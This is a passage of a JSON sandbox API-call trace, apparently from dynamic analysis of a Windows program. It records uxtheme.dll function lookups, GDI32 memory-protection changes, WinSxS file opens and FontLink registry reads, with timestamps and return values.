"name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeMargins" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74eaca30" } ], "repeated": 0, "id": 628 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428c15", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeIntList" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed87a0" } ], "repeated": 0, "id": 629 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428c27", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemePropertyOrigin" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74eab0b0" } ], "repeated": 0, "id": 630 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428c39", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "SetWindowTheme" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74eab230" } ], "repeated": 0, "id": 631 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428c4b", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeFilename" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed8730" } ], "repeated": 0, "id": 632 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428c5d", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeSysColor" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed8ab0" } ], "repeated": 0, "id": 633 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428c6f", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeSysColorBrush" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed8b60" } ], "repeated": 0, "id": 634 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428c81", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeSysBool" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed8a00" } ], "repeated": 0, "id": 635 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428c93", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeSysSize" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed8e20" } ], "repeated": 0, "id": 636 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428ca5", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeSysFont" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed8c10" } ], "repeated": 0, "id": 637 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428cb7", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeSysString" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed8ec0" } ], "repeated": 0, "id": 638 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428cc9", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeSysInt" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed8da0" } ], "repeated": 0, "id": 639 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428cdb", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "IsThemeActive" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74eac820" } ], "repeated": 0, "id": 640 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428ced", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "IsAppThemed" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74eac7d0" } ], "repeated": 0, "id": 641 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428cff", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetWindowTheme" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed9020" } ], "repeated": 0, "id": 642 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428d11", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "EnableThemeDialogTexture" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74eac900" } ], "repeated": 0, "id": 643 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428d23", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "IsThemeDialogTextureEnabled" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed9200" } ], "repeated": 0, "id": 644 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428d35", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeAppProperties" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74eabe70" } ], "repeated": 0, "id": 645 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428d47", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "SetThemeAppProperties" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed95f0" } ], "repeated": 0, "id": 646 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428d59", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetCurrentThemeName" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74eab7b0" } ], "repeated": 0, "id": 647 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428d6b", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "GetThemeDocumentationProperty" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed8650" } ], "repeated": 0, "id": 648 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428d7d", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "DrawThemeParentBackground" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74eaa290" } ], "repeated": 0, "id": 649 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00428d8f", "parentcaller": "0x00437d54", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "EnableTheming" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74ed7cf0" } ], "repeated": 0, "id": 650 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0040ce3b", "parentcaller": "0x00437d61", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "12" }, { "name": "ProcessInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 651 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0040ce3b", "parentcaller": "0x00437d61", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "12" }, { "name": "ProcessInformation", "value": "\\x00\\x80\\x00\\x00" } ], "repeated": 0, "id": 652 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0040ce3b", "parentcaller": "0x00437d61", "category": "registry", "api": "NtOpenKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000008", "pretty_value": "KEY_ENUMERATE_SUB_KEYS" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\AssemblyStorageRoots" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\AssemblyStorageRoots" } ], "repeated": 0, "id": 653 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0040ce3b", "parentcaller": "0x00437d61", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000278" }, { "name": "DesiredAccess", "value": "0x00100020", "pretty_value": "FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\WinSxS\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.19041.1_es-es_a8bd371b7dd7b043" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" } ], "repeated": 0, "id": 654 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0040ce3b", "parentcaller": "0x00437d61", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000027c" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\WinSxS\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.19041.1_es-es_a8bd371b7dd7b043\\comctl32.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 655 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0040ce3b", "parentcaller": "0x00437d61", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000280" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x0000027c" } ], "repeated": 0, "id": 656 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0040ce3b", "parentcaller": "0x00437d61", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000280" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a900000" }, { "name": "SectionOffset", "value": "0x0019e9b8" }, { "name": "ViewSize", "value": "0x00002000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 657 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0040ce3b", "parentcaller": "0x00437d61", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000280" } ], "repeated": 0, "id": 658 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0040ce70", "parentcaller": "0x00437d61", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "12" }, { "name": "ProcessInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 659 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0040ce70", "parentcaller": "0x00437d61", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "12" }, { "name": "ProcessInformation", "value": "\\x00\\x80\\x00\\x00" } ], "repeated": 0, "id": 660 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x004192f5", "parentcaller": "0x004195a6", "category": "misc", "api": "SystemParametersInfoW", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000042" }, { "name": "uiParam", "value": "0x0000000c" } ], "repeated": 1, "id": 661 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 662 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 663 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 664 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 665 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 666 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 667 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 668 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 669 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 0, "id": 670 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x07215000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 671 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0721a000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 672 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 673 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "DesiredAccess", "value": "0x00000109", "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_WOW64_64KEY" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink" } ], "repeated": 0, "id": 674 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "KeyInformation", "value": "\\xffb2\\xff84_\\x1c\t\\xff81\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00D\\x00\\x00\\x006\\x00\\x00\\x00\\xff84\\x03\\x00\\x00\\x14\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "4" } ], "repeated": 0, "id": 675 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0721f000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 676 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "0" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 677 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "0" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 678 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "1" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 679 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "1" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 680 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "2" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 681 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "2" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 682 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "3" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 683 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "3" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 684 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "4" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 685 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": 